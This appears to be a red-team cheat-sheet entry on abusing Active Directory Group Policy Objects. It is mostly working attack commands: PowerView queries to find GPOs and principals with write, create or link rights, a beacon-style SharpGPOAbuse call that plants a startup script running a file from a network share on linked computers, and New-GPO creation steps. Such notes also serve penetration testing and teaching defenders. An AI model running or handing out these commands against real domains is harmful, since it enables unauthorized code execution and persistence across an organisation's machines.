A Group Policy Object (GPO) is a collection of Group Policy settings. Each GPO consists of settings applied to selected OUs. GPOs can be created by domain admins and those groups or users who have been delegated the rights (usually these groups may be able to configure GPOs directed to selected OUs). After creation, GPOs must be linked to an OU to take effect.

Modify

Requirements

Look for GPOs with special ACLs:

Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "CreateChild|WriteProperty" -and $_.SecurityIdentifier -match "S-1-5-21-569305411-121244042-2357301523-[\d]{4,10}" }

Acquire GPO information:

# Get its name and location on filesystem
Get-DomainGPO -Identity "CN={[guid]},CN=Policies,CN=System,DC=[domain-dn]" | select displayName, gpcFileSysPath
 
# Get linked OU
Get-DomainOU -GPLink "{[guid]}" | select distinguishedName

To modify a GPO, edit files in \\[machine-fqdn]\SysVol\[domain-fqdn]\Policies\{[guid]} or do so with a tools like SharpGPOAbuse:

beacon> execute-assembly C:\Tools\SharpGPOAbuse\SharpGPOAbuse\bin\Release\SharpGPOAbuse.exe --AddComputerScript --ScriptName startup.bat --ScriptContents "start /b \\[domain]\[share]\[file-name]" --GPOName "[GPO to modify]"
# wait for a GPO update (or run gpupdate /force) and reboot

Create

See: registry autorun via GPO

To check if RSAT tooling is installed on this machine:

Get-Module -List -Name GroupPolicy | select -expand ExportedCommands

Create a GPO:

New-GPO -Name "[GPO Name]"

Look for principals allowed to create GPOs (PowerView):

Get-DomainObjectAcl -Identity "CN=Policies,CN=System,[domain-dn]" -ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" -and $_.ActiveDirectoryRights -contains "CreateChild" } | % { ConvertFrom-SID $_.SecurityIdentifier }

Look for principals allowed to link GPOs to OUs (PowerView):

Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "GP-Link" -and $_.ActiveDirectoryRights -match "WriteProperty" } | select ObjectDN,ActiveDirectoryRights,ObjectAceType,SecurityIdentifier | fl